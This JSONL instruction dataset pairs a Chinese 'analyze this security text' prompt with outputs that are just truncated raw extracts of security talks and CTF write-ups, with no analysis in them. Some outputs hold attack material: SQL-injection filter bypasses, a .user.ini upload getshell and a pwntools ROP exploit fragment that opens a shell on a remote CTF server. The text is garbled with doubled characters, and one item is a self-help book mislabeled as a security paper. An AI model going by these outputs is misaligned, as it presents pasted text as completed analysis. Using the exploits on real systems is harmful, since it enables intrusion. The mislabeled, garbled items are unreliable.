{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPaz Hameiri TEMPEST radio station About myself  System engineer  M.Sc. in Electro-Optical Engineering  Six years of experience with telecommunication systems design and circuits DEF CON 25 / Inbar and Eden / From \"One Country - One Floppy\" to \"Startup Nation\" - the story of the early days of the Israeli hacking community, and the journey towards today's vibrant startup scene  Wrote The Message Sticker when I was a teenager About TEMPEST  TEMPEST is a U.S. NSA specification and a NATO certification  The acronym refers to information leakage from a system through unintentional radio signals, audio signals, electrical signals, etc  In 1985, Wim van Eck published the first unclassified analysis of the security risks of information leakage from computer monitors  Government researchers were already aware of the danger TEMPEST radio station ?!?!  I read TEMPEST@Home - Finding Radio Frequency Side Channels by Davidov & Oldenburg  I bought an SDR receiver and studied the electromagnetic emissions generated by my laptop  I wondered:  How far can I transmit data using these emissions?  Is it possible to transmit audio in real-time?  How hard can it be? TEMPEST radio goals  Tunable frequency:  Receive signals from a specific computer when several computers in the area are active  Select a bandwidth with as little interference as possible, to improve the signal to noise ratio  Maximum bit rate, to maximize audio quality  Innocent looking software, to avoid detection  Maximum distance Radio waves crash course  Transmission: Electromagnetic radiation is propagated from a conducting object, conducting time-varying electric current  Reception: Electromagnetic radiation around a conducting object generate time-varying electric current Conductor i On-Off Keying crash course  On-Off Keying (OOK) data modulation represents digital data as the presence or absence of a transmitted wave  Example: Morse code time Energy Symbol n Symbol n+1 Symbol n+2 Data transmission using GDDR 1  The GPU", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\napache proxy 0x00 apacheoverviewhttps://t.zsxq.com/ubm2rVf p apachhttps://t.zsxq.com/rBmaU7a hookhttps://www.anquanke.com/post/id/257539 0x01 p vscodec/c++ubuntuapache hook [root@centos httpd-2.2.23-worker]# export SHOW_HOOKS=1 [root@centos httpd-2.2.23-worker]# ./bin/httpd -k start Registering hooks for core.c Hooked create_connection Hooked pre_connection Hooked post_config Hooked translate_name Hooked map_to_storage Hooked open_logs Hooked child_init Hooked handler  httpdhook mod_infohook http://httpd.apache.org/docs/2.2/mod/mod_info.html httpd.conf LoadModule info_module modules/mod_info.so <Location /server-info> SetHandler server-info Deny from all Allow from all </Location> http://host/server-info 0x02 mod_proxy.c33933450 AP_DECLARE_MODULE proxy APR_HOOK_STRUCT \"namespace\"_hook_\"hookname\"hook proxy_hook_scheme_handler proxy_hook_canon_handler proxy_hook_pre_request proxy_hook_post_request proxy_hook_request_status proxy_hook_check_trans proxy_run_*proxy_hook_get_* ap_hook_scheme_handlerhookproxy.cmod_proxy_http.c proxyhookproxy_hook_scheme_handlerproxy_hook_canon_handler APR_IMPLEMENT run_firstrun_allrun_first apacheok run_allfirstOKDECLINED proxy_hook_scheme_handlerproxy_hook_canon_handlerrun_first. 0x03 ap_hook_handler", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2018 Gigamon. All rights reserved. 1 可视及赋能 Gigamon助力构建现代网络多层次可视及安全 Gigamon / 英国技盟 技术经理 顾威 180 1600 0621  2017-2020 Gigamon Inc. All rights reserved. 1  2018 Gigamon. All rights reserved. 2 公司简介 分 支 机 构 20 国家 客 户 行 业 公共服务 | 金融服务 医疗健康 | 零售业 高科技 | 运营商 市 场 地 位 NGNPB 市场开拓及领导者 市场份额第一 专 利 66 世界专利 客 户 3,200 +客户 83% 财富100 雇 员 1000 雇员 C E O Paul Hooper 创 立 成 立 于 2004 *Feb 2018: Offices, employee and patent information **Q1 2018: Customer count 五位华人 可 视 化 -网 络 架 构 中 的 重 要 元 素 Gigamon提供对物理虚拟和云网络的前所未有的可视化并且被广泛应用 Gigamon正在引领网络和安全的融合 我们的解决方案有助于使安全威胁更加容 易被识别让您更灵活地部署资源并最大化提升工具效能增加投资回报. 全 面 可 视 灵 活 资 源 部 署 工 具 效 能 最 大 化 投 资 回 报  2018 Gigamon. All rights reserved. 3 连续6年网络可视化市场份额全球 #1  IHS Markit: Gigamon is the 2018 Market Share Leader  Source: IHS Markit: Network Monitoring Equipment Annual Market Report, 9 August 2019 by Matthias Machowinski 38% 2019年市场份额 市场份额第一 21% 2018年市场份额 超出排名第二的竞争2倍   IHS报告指出从2013年以来Gigamon一直保持 市场占有率第一位2018年Gigamon收入保持平稳 市场占有率36%继续领先第二位21% Get a copy of the IHS report here.  2018 Gigamon. All rights reserved. 4 Gigamon中国区部分客户  2018 Gigamon. All rights reserved. 5 全新安全架构 - 对安全设备的流量编排  2018 Gigamon. All rights reserved. 6 为什么需要下一代互联网出口架构 1. 众多的串联设备带来众多的故障点 2. 安全设备的升级维护需要中断网络 3. 增加或删除设备需要中断网络 4. 任一设备出现瓶颈可能引起网络中断 5. 出口设备的故障排查非常复杂 6. 高带宽的网络骨干很难部署安全产品 7. SSL加密流量带来安全产品性能和网络整体 安全性的问题 Si Si Si Si 防火墙1 Switch x 2 入侵防御 器1 WAF1 防火墙2 入侵防御 器2 WAF2  2018 Gigamon. All rights reserved. 7 二 层 安 全 设 备 典 型 的 串 接 部 署 痛点  部署复杂效率低  单点故障点多  工具效率低  缺乏安全部署的灵活性  故障排查困难 下一代边界安全架构: 串联旁路 (Inline Bypass)  物理定义 vs 软件策略定义 - 安全服务架构 最大限度发挥安全工具的性能 灵活的流量策略 提升安全工具监控效率 简化inline链接架构 在串联链路上增加移除维护安全产品更加 简便 减少增加安全工具带来的多故障点 将多安全工具的多点故障变为单一故障点并 通过硬件bypass来解决 提供串联并联监控 一体的解决方案 提供SSL硬件解密 T1 T2 T3 T3 T3 T1 T2 Inline Bypass T3 T3 T3  2018 Gigamon. All rights reserved. 8 应用场景1 串接性能面临挑战 安全工具需要检查所有通过流量 安全工具接口带宽线速处理性能 业务促销带来流量瞬间突发 Gigamon 解决方案 对流量进行按工具类型进行编排 不需要的流量不发送至工具 WAF 仅收到基于http类型的应用  性能优化-按工具需求编排流量 云应用 ERP 交易数据 IM Webex SQL 远程办公 Web 视频会议 Zoom 统一通信 邮件办公  2018 Gigamon. All rights reserved. 9 Traffic flows In", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Agent Man Category: Mobile, 200 Points ## Description > > --- TRANSMISSION START--- > > Special Agent; > ... > Exciting news! > > The wire is bustling with chatter about 'little green men' and how they were able to make their presence felt across the globe. > > Your mission is to locate the group and find a way to uncover their secrets. > > Attached is a sample gathered by our brave field-agents, best of luck; > > --- TRANSMISSION END --- An apk was attached. ## Solution Let's extract the APK: ```console root@kali:/media/sf_CTFs/matrix/Agent_Man# ~/utils/jadx/build/jadx/bin/jadx -d output agentman.apk INFO - loading ... INFO - processing ... ERROR - finished with errors, count: 1 ``` We get lots of files, but the interesting ones are here: ```console root@kali:/media/sf_CTFs/matrix/Agent_Man/output/sources/com/jagent# tree .  javaagent  BuildConfig.java  DownloadFile.java  MainActivity.java  R.java 1 directory, 4 files ``` `MainActivity.java` contains: ```java package com.jagent.javaagent; import android.os.Bundle; import android.widget.TextView; import androidx.appcompat.app.AppCompatActivity; public class MainActivity extends AppCompatActivity { public native String agentMan(String str); static { System.loadLibrary(\"agent\"); } /* access modifiers changed from: protected */ @Override // androidx.appcompat.app.AppCompatActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity public void onCreate(Bundle bundle) { super.onCreate(bundle); setContentView(R.layout.activity_main); TextView textView = (TextView) findViewById(R.id.mainText); String str = new DownloadFile().get(\"https://ctfroom.matrixcyberlabs.com/agent\"); if (str.isEmpty()) { textView.setText(agentMan(null)); } else { textView.setText(agentMan(str)); } } } ``` The main function downloads a file from a remote server, then calls `agentMan` and sets the text on the screen based on the return value of this function. `Downl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Heap Flags ## 关于Heap flags `Heap flags`包含有两个与`NtGlobalFlag`一起初始化的标志: `Flags`和`ForceFlags`. 这两个字段的值不仅会受调试器的影响, 还会由windows版本而不同, 字段的位置也取决于windows的版本. * Flags字段: * 在32位Windows NT, Windows 2000和Windows XP中, `Flags`位于堆的`0x0C`偏移处. 在32位Windows Vista及更新的系统中, 它位于`0x40`偏移处. * 在64位Windows XP中, `Flags`字段位于堆的`0x14`偏移处, 而在64位Windows Vista及更新的系统中, 它则是位于`0x70`偏移处. * ForceFlags字段: * 在32位Windows NT, Windows 2000和Windows XP中, `ForceFlags`位于堆的`0x10`偏移处. 在32位Windows Vista及更新的系统中, 它位于`0x44`偏移处. * 在64位Windows XP中, `ForceFlags`字段位于堆的`0x18`偏移处, 而在64位Windows Vista及更新的系统中, 它则是位于`0x74`偏移处. 在所有版本的Windows中, `Flags`字段的值正常情况都设为`HEAP_GROWABLE(2)`, 而`ForceFlags`字段正常情况都设为`0`. 然而对于一个32位进程(64位程序不会有此困扰), 这两个默认值, 都取决于它的宿主进程(host process)的[`subsystem`](https://msdn.microsoft.com/en-us/library/ms933120.aspx)版本(这里不是指所说的比如win10的linux子系统). 只有当`subsystem`在`3.51`及更高的版本, 字段的默认值才如前所述. 如果是在`3.10-3.50`版本之间, 则两个字段的`HEAP_CREATE_ALIGN_16 (0x10000)`都会被设置. 如果版本低于`3.10`, 那么这个程序文件就根本不会被运行. 如果某操作将`Flags`和`ForgeFlags`字段的值分别设为`2`和`0`, 但是却未对`subsystem`版本进行检查, 那么就可以表明该动作是为了隐藏调试器而进行的. 当调试器存在时, 在`Windows NT`, `Windows 2000`和32位`Windows XP`系统下, `Flags`字段会设置以下标志: ``` c HEAP_GROWABLE (2) HEAP_TAIL_CHECKING_ENABLED (0x20) HEAP_FREE_CHECKING_ENABLED (0x40) HEAP_SKIP_VALIDATION_CHECKS (0x10000000) HEAP_VALIDATE_PARAMETERS_ENABLED (0x40000000) ``` 在64位`Windows XP`系统, `Windows Vista`及更新的系统版本, `Flags`字段则会设置以下标志(少了`HEAP_SKIP_VALIDATION_CHECKS (0x10000000)`): ``` c HEAP_GROWABLE (2) HEAP_TAIL_CHECKING_ENABLED (0x20) HEAP_FREE_CHECKING_ENABLED (0x40) HEAP_VALIDATE_PARAMETERS_ENABLED (0x40000000) ``` 而对于`ForgeFlags`字段, 正常情况则会设置以下标志: ``` c HEAP_TAIL_CHECKING_ENABLED (0x20) HEAP_FREE_CHECKING_ENABLED (0x40) HEAP_VALIDATE_PARAMETERS_ENABLED (0x40000000) ``` 因为`NtGlobalFlag`标志的关系, `heap`也会设置一些标志位 * 如果在`NtGlobalFlag`字段中有设置`FLG_HEAP_ENABLE_TAIL_CHECK`标志, 那么在`heap`字段中就会设置`HEAP_TAIL_CHECKING_ENABLED`标志. * 如果在`NtGlobalFlag`字段中有设置`FLG_HEAP_ENABLE_FREE_CHECK`标志, 那么在`heap`字段中就会设置`FLG_HEAP_ENABLE_FREE_CHECK`标志. * 如果在`NtGlobalFlag`字段中有设置`FLG_HEAP_VALIDA", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThrough the Looking-Glass, and what Eve found there http://www.s3.eurecom.fr/lg/ Luca 'kaeso' Bruno <lucab@debian.org>, Mariano 'emdel' Graziano <graziano@eurecom.fr> 2 10/08/2014 About us  S3 group at Eurecom (FR) - System security  Embedded systems  Networking devices  Critical infrastructures  Memory forensics  Malware research 3 10/08/2014 Outline  Motivations  Intro to looking glasses  Threats  Vulns & incidents  Countermeasures 4 10/08/2014 Motivations  how this started  Picture yourself as a newbie cyber- criminal looking for the next target Aim: critical infrastructure Impact: worldwide Skill level: low Goal: break havoc 5 10/08/2014 Motivations  how this started  Picture yourself as a newbie cyber- criminal looking for the next target The Internet Impact: worldwide Skill level: low Goal: break havoc 6 10/08/2014 Motivations  how this started  Picture yourself as a newbie cyber- criminal looking for the next target The Internet Traffic routing across ASes Skill level: low Goal: break havoc 7 10/08/2014 Motivations  how this started  Picture yourself as a newbie cyber- criminal looking for the next target The Internet Traffic routing across ASes Basic web skills, google dorks, etc... Goal: break havoc 8 10/08/2014 Motivations  how this started  Picture yourself as a newbie cyber- criminal looking for the next target The Internet Traffic routing across ASes Basic web skills, google dorks, etc... Gaining access to BGP routers 9 10/08/2014 Motivations  how this started  Picture yourself as a newbie cyber- criminal looking for the next target A good candidate: LOOKING-GLASS 10 10/08/2014 Outline  Motivations  Intro to looking glasses  Threats  Vulns & incidents  Countermeasures 11 10/08/2014 The Internet  A network of networks, glued by BGP http://www.caida.org/research/topology/as_core_network/2014/ 12 10/08/2014 One routing-table, many routing-tables  BGP is worldwide, each AS routing table is a (partial) local view  What you see depends on where you are http:/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n过滤了了相关字符and,select,updatexml双写绕过就好空格用/**/代替拿到密 码 we1c0me%_#2&_@LCTF 进去之后发现任意提交passwd提示密码不不对让 num=0passwd=5487即可 虽然说写了了waf但是sqlmap照样能过XD各种tamper加上就好了了  题目一共分为三步 第一步是一个正则绕过 题目的正则应该是php://.resource=(.)$这种形式而且第一步应该先会检测是否是图片于双次 绕过就好了了: Nu1L LCTF writeup Web 签到题 我控几不不主我及几啦 苏达学姐的网站  再读一下file/admin.php.txt  熟悉的CBC字节翻转攻击  拿到cookie之后登录进去发现是一个上传页面测试后发现可以上传ini文件 于是通过上传.user.ini文件getshell菜刀连上发现flag  前几天刚爆出来的漏漏洞洞关于magic函数wakeup在反序列列化数据时如果属性过 多导致wakup失效具体文章可以自己找下利利用+号以及修改属性值绕过最 后利利用glob绕过open_basedir在/var/www/flag目录下发现flag  睡过了了 感觉学到很多的一个题目 首先是二次盲注我们发现随意注册一个用户进入之后会有修改用户头像的地 方而主办方放的提示是二次注入猜测修改头像时会把用户名带入查询如 果查询错误头像返回就是空如果不不是则头像返回就会有长度于是利利用 mid函数就可以了了py小脚本上一发  得到用户密码1d5afc15d99fe43fb602b25f3b5d2ee0 Cmd5解密是1admin2016 然后fuzz下目录发现有admin.php以及robots.txt用户更更换图片地方存在 ssrf但是没什什么用?不不过能看源码 主办方提示了了比较函数而直接admin账户登录是显示账户错误的于是user[]数 组绕过即可最后拿到flag  比较好玩的一个题目虽然最后看运气首先fuzz下目录发现  然后访问下  headpic 你一定不不能来这 下载下download.php:  Hash长度扩展攻击利利用py下的hashpumpy爆破下secert的长度就可以了了  得到长度是18  然后下载www.rar发现有密码QAQhex编辑器器打开在最后发现jjencode代码 github上有解密的脚本  YoU CAN gET Some INterESted Thing If You CAN deCOde Me In tImE. 培根密码XXDDCCTTFF 拿到源码之后没有什什么逻辑就是爆破time时间戳与rand随机数1-10000结合 之后的md5  于是burp或者自己写多线程脚本跑就好了了  要注意抓包获得的时间并不不是东八区北北京时间所以需要加8才能算对感谢 主办方后期心疼我们改了了时间要不不然根本出不不来= = 很明显的栈溢出然后就是构造ROP泄露露libc地址调用system(/bin/sh) from pwn import * DEBUG = 0 if DEBUG: context.log_level = 'debug' io = process('./pwn100') Pwn Pwn100 gdb.attach(io) else: io = remote('119.28.63.211', 2332) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') elf = ELF('./pwn100') puts_got_addr = elf.got['puts'] read_got_addr = elf.got['read'] puts_plt_addr = elf.symbols['puts'] read_plt_addr = elf.symbols['read'] pop_rdi_ret_addr = 0x0000000000400763 pop_rsi_pop_r15_ret_addr = 0x0000000000400761 pop_pop_pop_pop_ret_addr = 0x000000000040075d rsp = 0x00601300 payload = 'A' * 0x40 + 'B' * 0x8 + p64(pop_rdi_ret_addr) + p64( puts_got_addr) + p64(puts_plt_addr) payload += p64(pop_rdi_ret_addr) + p64(read_got_addr) + p64(put s_plt_addr) payload += p64(pop_rdi_ret_addr) + p64(0) + p64(p", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n封面 书名 版权 前言 目录 第一部分 准备工作 第1 章 熟悉工作环境和相关工具 1 . 1 调试工具Mi c r o s o f t V i s u a l C + + 6 . 0 和O l l y D B G 1 . 2 反汇编静态分析工具I D A 1 . 3 反汇编引擎的工作原理 1 . 4 本章小结 第二部分C + + 反汇编揭秘 第2 章 基本数据类型的表现形式 2 . 1 整数类型 2 . 1 . 1 无符号整数 2 . 1 . 2 有符号整数 2 . 2 浮点数类型 2 . 2 . 1 浮点数的编码方式 2 . 2 . 2 基本的浮点数指令 2 . 3 字符和字符串 2 . 3 . 1 字符的编码 2 . 3 . 2 字符串的存储方式 2 . 4 布尔类型 2 . 5 地址指针和引用 2 . 5 . 1 指针和地址的区别 2 . 5 . 2 各类型指针的工作方式 2 . 5 . 3 引用 2 . 6 常量 2 . 6 . 1 常量的定义 2 . 6 . 2 # d e f i n e 和c o n s t 的区别 2 . 7 本章小结 第3 章 认识启动函数找到用户入口 3 . 1 程序的真正入口 3 . 2 了解V C + + 6 . 0 的启动函数 3 . 3 ma i n 函数的识别 3 . 4 本章小结 第4 章 观察各种表达式的求值过程 4 . 1 算术运算和赋值 4 . 1 . 1 各种算术运算的工作形式 4 . 1 . 2 算术结果溢出 4 . 1 . 3 自增和自减 4 . 2 关系运算和逻辑运算 4 . 2 . 1 关系运算和条件跳转的对应 4 . 2 . 2 表达式短路 4 . 2 . 3 条件表达式 4 . 3 位运算 4 . 4 编译器使用的优化技巧 4 . 4 . 1 流水线优化规则 4 . 4 . 2 分支优化规则 4 . 4 . 3 高速缓存c a c h e 优化规则 4 . 5 一次算法逆向之旅 4 . 6 本章小结 第5 章 流程控制语句的识别 5 . 1 i f 语句 5 . 2 i f  e l s e  语句 5 . 3 用i f 构成的多分支流程 5 . 4 s w i t c h 的真相 5 . 5 难以构成跳转表的s w i t c h 5 . 6 降低判定树的高度 5 . 7 d o / w h i l e / f o r 的比较 5 . 8 编译器对循环结构的优化 5 . 9 本章小结 第6 章 函数的工作原理 6 . 1 栈帧的形成和关闭 6 . 2 各种调用方式的考察 6 . 3 使用e b p 或e s p 寻址 6 . 4 函数的参数 6 . 5 函数的返回值 6 . 6 回顾 6 . 7 本章小结 第7 章 变量在内存中的位置和访问方式 7 . 1 全局变量和局部变量的区别 7 . 2 局部静态变量的工作方式 7 . 3 堆变量 7 . 4 本章小结 第8 章 数组和指针的寻址 8 . 1 数组在函数内 8 . 2 数组作为参数 8 . 3 数组作为返回值 8 . 4 下标寻址和指针寻址 8 . 5 多维数组 8 . 6 存放指针类型数据的数组 8 . 7 指向数组的指针变量 8 . 8 函数指针 8 . 9 本章小结 第9 章 结构体和类 9 . 1 对象的内存布局 9 . 2 t h i s 指针 9 . 3 静态数据成员 9 . 4 对象作为函数参数 9 . 5 对象作为返回值 9 . 6 本章小结 第1 0 章 关于构造函数和析构函数 1 0 . 1 构造函数的出现时机 1 0 . 2 每个对象都有默认的构造函数吗 1 0 . 3 析构函数的出现时机 1 0 . 4 本章小结 第1 1 章 关于虚函数 1 1 . 1 虚函数的机制 1 1 . 2 虚函数的识别 1 1 . 3 本章小结 第1 2 章 从内存角度看继承和多重继承 1 2 . 1 识别类和类之间的关系 1 2 . 2 多重继承 1 2 . 3 虚基类 1 2 . 4 菱形继承 1 2 . 5 本章小结 第1 3 章 异常处理 1 3 . 1 异常处理的相关知识 1 3 . 2 异常类型为基本数据类型的处理流程 1 3 . 3 异常类型为对象的处理流程 1 3 . 4 识别异常处理 1 3 . 5 本章小结 第三部分 逆向分析技术应用 第1 4 章P E i D 的工作原理分析 1 4 . 1 开发环境的识别 1 4 . 2 开发环境的伪造 1 4 . 3 本章小结 第1 5 章 熊猫烧香 病毒逆向分析 1 5 . 1 调试环境配置 1 5 . 2 病毒程序初步分析 1 5 . 3  熊猫烧香 的启动过程分析 1 5 . 4  熊猫烧香 的自我保护分析 1 5 . 5  熊猫烧香", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# The all-seeing eye Category: Cryptography ## Description > Remember - reality is an illusion An image was attached. ## Solution The attached image looks like some kind of substitution cipher: ![](images/all_seeing.png) We obviously know that the prefix is `cstechnion`. We can see that the `ש` stand for `'c'` and matches the expected locations in `cstechnion`. However, how do we proceed from here? Searching Google for some kind of ancient hieroglyphs didn't help much, and a reverse image search of the symbols wasn't helpful either. Finally, searching for the sentence in the description gave a lead: \"Remember - reality is an illusion\" is a quote from the animated TV show \"Gravity Falls\" said by no other than a character called \"Bill Cipher\": > \"Remember: reality is an illusion. The universe is a hologram. Buy gold. Bye!\". Investigating this lead further reveals the following key ([source](https://www.pinterest.com/pin/426575395956010392/)): ![](images/bill_cipher.png) Using it, we can decrypt the flag to `cstechnion{galf_drawkcab}`.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nScrew Being A Pentester - When I Grow Up I Want To Be A Bug Bounty Hunter Jake Kouns @jkouns Chief Information Security Officer (CISO) Risk Based Security Carsten Eiram @CarstenEiram Chief Research Officer (CRO) Risk Based Security N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Risk Based Security Community offerings: Commercial offerings: Information Security: Career Decisions N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y IT Security Career Choices! N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y IT Security Career Choices  Blue vs. Red! N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y IT Security Career Choices  Red Team! N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Pentester  Good Things About Red Teams N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Red Teams = Pentester N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Pentester - Painful At Times? N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Pentester - Painful At Times? Also the option of becoming an independent pentester! Dont have to work for the man, but work time breakdown is roughly:  1/3 actual pentesting (fun)  1/3 administrative tasks and documentation  1/3 being a sales weazel (finding clients!) N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Is There A Better Career Choice? N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Bounty Hunters N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Bounty Hunters Quick Overview To Set The Bug Bounty Stage N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Research Motivation  Old Skool N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Research Motivation  Old Skool Reporting vulnerabilities to vendors back in the day (and sometimes today) was often a hassle! Researchers would instead find alternatives... N O T J U S T S E C U R I T Y , T H E R I G H T S E C U ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking G Suite: The Power of Dark Apps Script Magic By @IAmMandatory (Matthew Bryant) Who am I?  mandatory (Matthew Bryant)  Leading the Red Team Effort at Snapchat  @IAmMandatory  Hacking write ups and research at https://thehackerblog.com Context & Background What exactly are we dealing with here? Google Workspace (AKA G Suite)  Suite of Google services for employees to work together online (Gmail, Docs/Sheets/Slides, Drive, GCP etc).  Businesses can manage employees and set up powerful security and ACL policies.  Many of these services are used individually by free Google users as well.  >2 billion users! Apps Script: Automate Google Services With JavaScript  Serverless JavaScript apps which are hosted by Google and highly optimized for automating Google services.  Seamless integration with Googles app registration and OAuth permission requesting system.  Variety of triggers to start scripts: web request, document open, scheduled, etc. Example of the Apps Script Editor Google OAuth 2.0  Allows third party apps to request access to resources owned by Google users.  Permissions to resources are known as scopes and there are over 250 of them!  Users are presented with a prompt describing roughly what access theyre granting which they can allow/reject.  On approval you get tokens which you can use for the API(s) Example OAuth Permission Prompts Tying It All Together: Thinking Beyond the Machines  When attacking G Suite, Apps Script is an attractive option for phishing as well as backdooring accounts.  An Apps Script implant is outside the eyes of antivirus, endpoint detection tooling, and other on-device monitoring.  Even if your victim wipes their laptop, your implant remains! Tough Perimeters Require Clever Attacks  We can utilize Apps Script to pierce even the most hardened environments.  Companies with mandatory hardware U2F on logins, hardened Chromebooks, hardware attestation, third-party OAuth scope blocking, etc.  To get around these measures well have to be", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRotten code, aging standards, & pwning IPv4 parsing across nearly every mainstream programming language 2 @jfslowik 3 Disclaimer  None of this research was paid for  We research in good faith  Nothing today represents our past/present/future employers  None of us are under gag orders*  All images are CC0 or public domain  All trademarks, logos and brand names are the property of their respective owners 4 What will we be discussing today?  CVE-2020-28360 9.8  CVE-2021-28918 9.1  CVE-2021-29418 5.3 (@Ryotkaks emergency fix)  CVE-2021-29921 9.8  CVE-2021-29662 7.5  CVE-2021-29424 7.5  CVE-2021-29922 new est. 9.8  CVE-2021-29923 new est. 9.8  Oracle S1446698 pending est. 9.8  ***** 768013610 pending est. 9.8 5 Talk format  Finding this type of vuln  How to horizontally scale your vulnerabilities  Some PoCs  Exploitability of a vuln  Further attack vectors/research 6 Takeaways  #patchtuesday every day  Patching* an entire class of this size? *Apologies to anyone who might have to go patch right after this 7 Takeaways  Exponential vulnerability disclosures  Thought models to magnify your attack vectors  Horizontally scale your research 8 What do you see? 9 10 Youre listening to... Sick Codes @sickcodes Kelly Kaoudis @kaoudis 11 Presenting our work with... John Jackson @johnjhacking Nick Sahler @tensor_bodega Victor Viale @Koroeskohr Cheng Xu @_xucheng_ Harold Hunt @huntharo 12 Quickstart Octal (base-8) number system 0 1 2 3 4 5 6 7 https://linguistics.berkeley.edu/~avelino/Avelino_2006.pdf 13 No 8s or 9s, 0-7 only 14 Leaving home 15 Coming home 16 t Coming home 17 0177.0.0.1  127.0.0.1 https://check-host.net/ 18 87.0.0.1  0127.0.0.1 https://check-host.net/ 19 @bagder (curl guy) 20 @bagder (curl guy) 21 Rotten code?  Bitrot, but for dependencies (not blame hour!)  How well-tested should developers assume a widely-used or standard library is? 22 Contributing factors 23 Contributing factors 24 Contributing factors  No (ratified) IP address format standard  Who even uses octa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n[ 高效能人士的七个习惯 ]   ~ 1 ~ 封面 [ 高效能人士的七个习惯 ]   ~ 2 ~ 感谢 爱书网 www.ilovebook.cn 提供图书模板 [ 高效能人士的七个习惯 ]   ~ 3 ~ 赞誉之辞 史蒂芬柯维写了一本关于人类生存状况的巨 著不仅文字优美而且深深洞察了我们内心所关 注的东西这本书无论对个人还是对组织都非常有 用我要将把它赠送给每一个我所认识的人 沃伦本尼斯世界领导力大师成为领 导者作者 史蒂芬柯维是美国的苏格拉底他使你畅开 心扉去面对生命中一些永恒的东西金钱家庭 人际关系生命价值 [ 高效能人士的七个习惯 ]   ~ 4 ~ 博恩崔西世界潜能大师 成功心理学 作者 无论是学习企业管理的学生还是正在从事管 理工作的人都不太会像史蒂芬柯维那样对组织与 管理的首要原则进行如此细致和深入的思考他在 高效能人士的七个习惯中给了我们一个机会 而不仅仅是一种指导他以其卓越的洞察力为我们 提供了一个了解自己和了解自己对他人的影响的机 会这是一本能改变你命运的奇书 汤姆彼得斯世界管理学大师追求卓 越作者 正当美国各企事业单位政党和社会团体迫切 需要鼓舞士气并培养出各阶层领导人的时候柯维 适时地提供了一种有助于自我提高的人生哲学它 可称得上是个人事业成功的最佳保证它是智慧 情感和实践经验的结晶 [ 高效能人士的七个习惯 ]   ~ 5 ~ 罗莎贝丝莫斯坎特哈佛商学院的首 席管理教授巨人学舞作者 高效能人士的七个习惯是本奇书它告诉 人们应当把对个人对家庭和对事业的责任统一起 来它在这方面所起的作用超过了任何一本我曾读 过的书 保罗汤普森杨百翰大学麦里特商学院 院长更迭作者 高效能人士的七个习惯为我们提供了处理 人际关系的法则如能静下想想必将获益匪浅 吉姆斯弗雷切美国国家航空航天局局 长 [ 高效能人士的七个习惯 ]   ~ 6 ~ 我不知道有哪一位教师或哪一种方法能像本 书这样对个人绩效的提升产生如此巨大的积极作 用本书萃取了史蒂芬柯维人生哲学体系的精 髓我相信读过此书的人都会明白为什么柯维博士 的指导会对我及其他人产生如此巨大的影响 约翰白波宝洁公司董事长 高效能人士的七个习惯是所有人成功的钥 匙它令人深思发人深省 爱德华布瑞南美国西尔斯百货公司董 事长兼执行总裁 我发现此书能令人精神振奋思维活跃它是 我思考和行动的指南 瑞秋狄维士安利公司总裁 [ 高效能人士的七个习惯 ]   ~ 7 ~ 这是一本震撼人心的著作他提出的关于构思 领导和公关的原理组成了培训现代企业管理者的实 用工具我强烈推荐本书 诺兰阿奇博尔德布莱克戴克公司总 裁兼首席执行官 我们应当将阅读该书并运用书中知识作为对 事业单位党政机关各阶层人员的一项要求这将 比任何一部公务员道德行为规范所起的作用都大 美国共和党首席参议员贾杰克 就对社会各阶层领导者的贡献而言没人能比 得上史蒂芬柯维所有有文化的人都能从阅读 该书并运用书中所述原理获益 美国参议员奥林哈奇 [ 高效能人士的七个习惯 ]   ~ 8 ~ 高效能人士的七个习惯是能够长时间一直 位居榜单的畅销书之一 美国财富 杂志柯维是热门的并将越来越热 美国商业周刊 柯维是继戴尔卡耐基之后在当今商业领域 最权威的自我提升顾问 今日美国 柯维指明了在家庭企业和社会中处理人际关 系的普遍真理使我们免遭市面上一些蹩脚的人际 关系类书籍的茶毒我们应该把阅读他的著作当成 是在实施一项工程而不能像浏览图片那样看完 就算柯维既不是个乐观主义者也不是个悲观主 [ 高效能人士的七个习惯 ]   ~ 9 ~ 义者而是一个可能主义者他认为我们有能力去 开启自我改造的大门这本书名叫高效能人士的 七个习惯读它的理由却远远不止 7 